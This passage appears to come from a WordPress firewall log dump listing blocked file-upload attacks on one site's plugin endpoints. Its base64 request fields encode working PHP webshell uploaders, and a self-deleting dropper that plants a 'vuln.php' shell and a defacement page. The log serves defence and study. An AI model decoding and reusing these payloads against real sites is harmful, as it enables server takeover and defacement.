YWQuIjsgfSB9ID8+Ci0tYTM4YzNmMjgwNTQwMDg0NWNiYzc4NmI1YjUzNzZiZWMtLQo=\"}'),(175076,1604378197.194661,1604378194.439100,'\0\0\0\0\0\0\0\0\0\04y',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQwNDQuMTI5IFNhZmFyaS81MzcuMzYKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT04NjMyNDhjNDU0NWExNjRjODY1NTZjYjA2NWNhODYwNgpDb250ZW50LUxlbmd0aDogOTkyCgotLTg2MzI0OGM0NTQ1YTE2NGM4NjU1NmNiMDY1Y2E4NjA2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfSUQiCgoxCi0tODYzMjQ4YzQ1NDVhMTY0Yzg2NTU2Y2IwNjVjYTg2MDYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9Ub2tlbiIKCmJhMjg4MjUyNjI5YTUzOTk3NTliNmZkZTFlMjA1YmMyCi0tODYzMjQ4YzQ1NDVhMTY0Yzg2NTU2Y2IwNjVjYTg2MDYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9GaWxlVXBsb2FkRGlyIgoKL3dwLWNvbnRlbnQvdXBsb2Fkcy9zaW1wbGUtZmlsZS1saXN0LwotLTg2MzI0OGM0NTQ1YTE2NGM4NjU1NmNiMDY1Y2E4NjA2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVGltZXN0YW1wIgoKMTU4NzI1ODg4NQotLTg2MzI0OGM0NTQ1YTE2NGM4NjU1NmNiMDY1Y2E4NjA2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJzeXZ4aWx0d3plLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKRXhwaXJlczogMAoKPD9waHAgZWNobyAiTW9oYW1lZFhPLVNwM2N0cmEiOyBlY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7IGVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+IDxpbnB1dCB0eXBlPSdmaWxlJyBuYW1lPSd6Yic+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz48L2Zvcm0+IjsgaWYoJF9QT1NUWyd1cGxvYWQnXSkgeyBpZihAY29weSgkX0ZJTEVTWyd6YiddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWyd6YiddWyduYW1lJ10pKSB7IGVjaG8gImVYcGxvaXRpbmcgRG9uZSI7IH0gZWxzZSB7IGVjaG8gIkZhaWxlZCB0byBVcGxvYWQuIjsgfSB9ID8+Ci0tODYzMjQ4YzQ1NDVhMTY0Yzg2NTU2Y2IwNjVjYTg2MDYtLQo=\"}'),(175077,1604802681.680153,1604802679.705500,'\0\0\0\0\0\0\0\0\0\04y',0,403,0,0,0,'https://ashbyresort.com/wp-content/plugins/formcraft/file-upload/server/php/',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbZmlsZXNdWzBd\",\"paramValue\":\"MTk5ODc3LnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC8=\",\"category\":\"file_upload\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL2Zvcm1jcmFmdC9maWxlLXVwbG9hZC9zZXJ2ZXIvcGhwLyBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjAKWC1IdHRwczogMQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTM4Y2EwNGZlM2Y0Zjc1MDFmZTFiMTJjN2QxMDg1NmVhCkNvbnRlbnQtTGVuZ3RoOiA1MjUKCg==\"}'),(175078,1604952242.136877,1604952240.146200,'\0\0\0\0\0\0\0\0\0\0RfL',0,403,0,0,0,'http://ashbyresort.com//wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvY2hlcnJ5LXBsdWdpbi9hZG1pbi9pbXBvcnQtZXhwb3J0L3VwbG9hZC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvL3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjAKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT02ZjU1MWZmNGUxOTNlYmFkNzNjMWQ4NWVlZmRhNjQwNgpDb250ZW50LUxlbmd0aDogMTUxMgoKLS02ZjU1MWZmNGUxOTNlYmFkNzNjMWQ4NWVlZmRhNjQwNgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0ic2V0dGluZ3NfYXV0by5waHAiCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YQpFeHBpcmVzOiAwCgo8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPg0KPD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRzID0gJzx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+PD9waHAgZWNobyBcJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPlwnO2VjaG8gXCc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+XCc7aWYoICRfUE9TVFsiX3VwbCJdID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwgJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0pKSB7IGVjaG8gIjxiPlNoZWxsIFVwbG9hZGVkICEgOik8Yj48YnI+PGJyPiI7IH1lbHNlIHsgZWNobyAiPGI+Tm90IHVwbG9hZGVkICEgPC9iPjxicj48YnI+IjsgfX0\\/Pic7DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIjsNCiR0ZXh0ID0gJHM7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9ICdWdWxuISEgcGF0Y2ggaXQgTm93ISc7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQo\\/Pg0KCi0tNmY1NTFmZjRlMTkzZWJhZDczYzFkODVlZWZkYTY0MDYtLQo=\"}'),(175079,1604952449.464972,1604952447.962500,'\0\0\0\0\0\0\0\0\0\0RfL',0,403,0,0,0,'http://ashbyresort.com//wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PThmMTVhZTM3NzU5MTcyZTFjMmEwY2VlMGVmY2M3OTRkCkNvbnRlbnQtTGVuZ3RoOiAxNzIyCgotLThmMTVhZTM3NzU5MTcyZTFjMmEwY2VlMGVmY2M3OTRkCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iYWN0aW9uIgoKbm1fcGVyc29uYWxpemVkcHJvZHVjdF91cGxvYWRfZmlsZQotLThmMTVhZTM3NzU5MTcyZTFjMmEwY2VlMGVmY2M3OTRkCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibmFtZSIKCnVwbG9hZC5waHAKLS04ZjE1YWUzNzc1OTE3MmUxYzJhMGNlZTBlZmNjNzk0ZApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0ic2V0dGluZ3NfYXV0by5waHAiCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YQpFeHBpcmVzOiAwCgo8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPg0KPD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRzID0gJzx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+PD9waHAgZWNobyBcJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPlwnO2VjaG8gXCc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+XCc7aWYoICRfUE9TVFsiX3VwbCJdID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwgJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0pKSB7IGVjaG8gIjxiPlNoZWxsIFVwbG9hZGVkICEgOik8Yj48YnI+PGJyPiI7IH1lbHNlIHsgZWNobyAiPGI+Tm90IHVwbG9hZGVkICEgPC9iPjxicj48YnI+IjsgfX0\\/Pic7DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIjsNCiR0ZXh0ID0gJHM7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9ICdWdWxuISEgcGF0Y2ggaXQgTm93ISc7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQo\\/Pg0KCi0tOGYxNWFlMzc3NTkxNzJlMWMyYTBjZWUwZWZjYzc5NGQtLQo=\"}'),(175080,1604952439.878500,1604952437.891800,'\0\0\0\0\0\0\0\0\0\0RfL',0,403,0,0,0,'http://ashbyresort.com//wp-admin/admin-post.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1wb3N0LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvL3dwLWFkbWluL2FkbWluLXBvc3QucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTk1N2U0ZDYxYzgxNzRmODI0ZTI1NDI5YWEwN2Q3NmYxCkNvbnRlbnQtTGVuZ3RoOiAxNjY5CgotLTk1N2U0ZDYxYzgxNzRmODI0ZTI1NDI5YWEwN2Q3NmYxCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2V0dGluZ3NfdXBsb2FkIgoKc2V0dGluZ3MKLS05NTdlNGQ2MWM4MTc0ZjgyNGUyNTQyOWFhMDdkNzZmMQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InBhZ2UiCgpwYWdlbGluZXMKLS05NTdlNGQ2MWM4MTc0ZjgyNGUyNTQyOWFhMDdkNzZmMQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0ic2V0dGluZ3NfYXV0by5waHAiCkNvbnRlbnQtVHlwZTogCkV4cGlyZXM6IDAKCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJHMgPSAnPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT48P3BocCBlY2hvIFwnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+XCc7ZWNobyBcJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT5cJztpZiggJF9QT1NUWyJfdXBsIl0gPT0gIlVwbG9hZCIgKSB7aWYoQGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSkpIHsgZWNobyAiPGI+U2hlbGwgVXBsb2FkZWQgISA6KTxiPjxicj48YnI+IjsgfWVsc2UgeyBlY2hvICI8Yj5Ob3QgdXBsb2FkZWQgISA8L2I+PGJyPjxicj4iOyB9fT8+JzsNCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWNvbnRlbnQvdnVsbi5waHAiOw0KJHRleHQgPSAkczsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gJ1Z1bG4hISBwYXRjaCBpdCBOb3chJzsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoKLS05NTdlNGQ2MWM4MTc0ZjgyNGUyNTQyOWFhMDdkNzZmMS0tCg==\"}'),(175081,1604952471.959035,1604952470.809800,'\0\0\0\0\0\0\0\0\0\0RfL',0,403,0,0,0,'http://ashbyresort.com//wp-content/plugins/barclaycart/uploadify/uploadify.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvYmFyY2xheWNhcnQvdXBsb2FkaWZ5L3VwbG9hZGlmeS5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvL3dwLWNvbnRlbnQvcGx1Z2lucy9iYXJjbGF5Y2FydC91cGxvYWRpZnkvdXBsb2FkaWZ5LnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjAKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT1mMjA5ODM0YjQ0NjczNzA1OTkxODYwMDZlY2FmZDU4YgpDb250ZW50LUxlbmd0aDogMTUxNgoKLS1mMjA5ODM0YjQ0NjczNzA1OTkxODYwMDZlY2FmZDU4YgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkZpbGVkYXRhIjsgZmlsZW5hbWU9InNldHRpbmdzX2F1dG8ucGhwIgpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGEKRXhwaXJlczogMAoKPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokcyA9ICc8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPjw\\/cGhwIGVjaG8gXCc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj5cJztlY2hvIFwnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPlwnO2lmKCAkX1BPU1RbIl91cGwiXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSkgeyBlY2hvICI8Yj5TaGVsbCBVcGxvYWRlZCAhIDopPGI+PGJyPjxicj4iOyB9ZWxzZSB7IGVjaG8gIjxiPk5vdCB1cGxvYWRlZCAhIDwvYj48YnI+PGJyPiI7IH19Pz4nOw0KJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtY29udGVudC92dWxuLnBocCI7DQokdGV4dCA9ICRzOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3Z1bG4uaHRtIiA7DQokdGV4dDIgPSAnVnVsbiEhIHBhdGNoIGl0IE5vdyEnOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCgotLWYyMDk4MzRiNDQ2NzM3MDU5OTE4NjAwNmVjYWZkNThiLS0K\"}'),(175082,1604952464.018140,1604952462.256400,'\0\0\0\0\0\0\0\0\0\0RfL',0,403,0,0,0,'http://ashbyresort.com//wp-admin/admin-ajax.php?action=getcountryuser&cs=2',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload 